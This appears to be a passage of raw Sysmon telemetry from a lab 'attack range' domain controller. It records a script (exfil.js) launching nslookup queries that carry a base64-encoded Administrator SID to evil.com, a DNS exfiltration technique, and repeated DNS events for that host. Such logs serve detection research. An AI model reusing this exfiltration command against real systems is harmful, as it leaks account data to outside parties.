22542200x8000000000000000204098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.671{00000000-0000-0000-0000-000000000000}7060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.584{00000000-0000-0000-0000-000000000000}7848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.424{00000000-0000-0000-0000-000000000000}5736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.319{00000000-0000-0000-0000-000000000000}3656evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.236{00000000-0000-0000-0000-000000000000}7200evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.135{00000000-0000-0000-0000-000000000000}5928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.046{00000000-0000-0000-0000-000000000000}1696evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000204091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-17CC-629A-EC41-000000005F02}41366448C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-ED41-000000005F02}2388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-ED41-000000005F02}2388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-17CC-629A-EB41-000000005F02}71447536C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-ED41-000000005F02}2388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.794{2E1864BB-17CC-629A-ED41-000000005F02}2388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-EB41-000000005F02}7144C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyvy.tmp 2>&1 10341000x8000000000000000204083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.741{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-EC41-000000005F02}4136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.741{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-EC41-000000005F02}4136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.741{2E1864BB-17CC-629A-EC41-000000005F02}41366448C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-EB41-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.722{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53060- 354300x8000000000000000204079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.722{00000000-0000-0000-0000-000000000000}8136<unknown process>-udptruefalse127.0.0.1-53060-false127.0.0.1-53domain 354300x8000000000000000204078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.721{00000000-0000-0000-0000-000000000000}8136<unknown process>-udpfalsefalse127.0.0.1-53059-false127.0.0.1-53domain 354300x8000000000000000204077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53059- 354300x8000000000000000204076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.720{00000000-0000-0000-0000-000000000000}8136<unknown process>-udptruefalse127.0.0.1-53059-false127.0.0.1-53domain 354300x8000000000000000204075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.718{00000000-0000-0000-0000-000000000000}8136<unknown process>-udpfalsefalse127.0.0.1-53058-false127.0.0.1-53domain 354300x8000000000000000204074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.718{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53058- 354300x8000000000000000204073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.718{00000000-0000-0000-0000-000000000000}8136<unknown process>-udptruefalse127.0.0.1-53058-false127.0.0.1-53domain 354300x8000000000000000204072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.580{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-53057-false127.0.0.1-53domain 354300x8000000000000000204071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53057- 354300x8000000000000000204070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.580{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-53057-false127.0.0.1-53domain 354300x8000000000000000204069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.579{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53056- 354300x8000000000000000204068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.579{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-53056-false127.0.0.1-53domain 354300x8000000000000000204067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.579{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-53055-false127.0.0.1-53domain 354300x8000000000000000204066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.579{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53055- 354300x8000000000000000204065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.455{00000000-0000-0000-0000-000000000000}7320<unknown process>-udpfalsefalse127.0.0.1-53054-false127.0.0.1-53domain 354300x8000000000000000204064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.455{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53054- 354300x8000000000000000204063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.455{00000000-0000-0000-0000-000000000000}7320<unknown process>-udptruefalse127.0.0.1-53054-false127.0.0.1-53domain 354300x8000000000000000204062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.455{00000000-0000-0000-0000-000000000000}7320<unknown process>-udpfalsefalse127.0.0.1-53053-false127.0.0.1-53domain 354300x8000000000000000204061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.454{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53053- 354300x8000000000000000204060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.454{00000000-0000-0000-0000-000000000000}7320<unknown process>-udptruefalse127.0.0.1-53053-false127.0.0.1-53domain 10341000x8000000000000000204059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-EC41-000000005F02}4136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000204058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.454{00000000-0000-0000-0000-000000000000}7320<unknown process>-udpfalsefalse127.0.0.1-53052-false127.0.0.1-53domain 354300x8000000000000000204057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.454{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53052- 354300x8000000000000000204056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.453{00000000-0000-0000-0000-000000000000}7320<unknown process>-udptruefalse127.0.0.1-53052-false127.0.0.1-53domain 354300x8000000000000000204055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.349{00000000-0000-0000-0000-000000000000}7460<unknown process>-udpfalsefalse127.0.0.1-53051-false127.0.0.1-53domain 354300x8000000000000000204054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.349{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53051- 354300x8000000000000000204053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.349{00000000-0000-0000-0000-000000000000}7460<unknown process>-udptruefalse127.0.0.1-53051-false127.0.0.1-53domain 354300x8000000000000000204052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.349{00000000-0000-0000-0000-000000000000}7460<unknown process>-udpfalsefalse127.0.0.1-53050-false127.0.0.1-53domain 354300x8000000000000000204051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.348{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53050- 354300x8000000000000000204050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.348{00000000-0000-0000-0000-000000000000}7460<unknown process>-udptruefalse127.0.0.1-53050-false127.0.0.1-53domain 354300x8000000000000000204049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.348{00000000-0000-0000-0000-000000000000}7460<unknown process>-udpfalsefalse127.0.0.1-53049-false127.0.0.1-53domain 354300x8000000000000000204048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.348{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53049- 354300x8000000000000000204047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.348{00000000-0000-0000-0000-000000000000}7460<unknown process>-udptruefalse127.0.0.1-53049-false127.0.0.1-53domain 10341000x8000000000000000204046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-EB41-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-17A1-629A-783D-000000005F02}55524228C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-EB41-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.730{2E1864BB-17CC-629A-EB41-000000005F02}7144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyvy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.725{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyeio.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 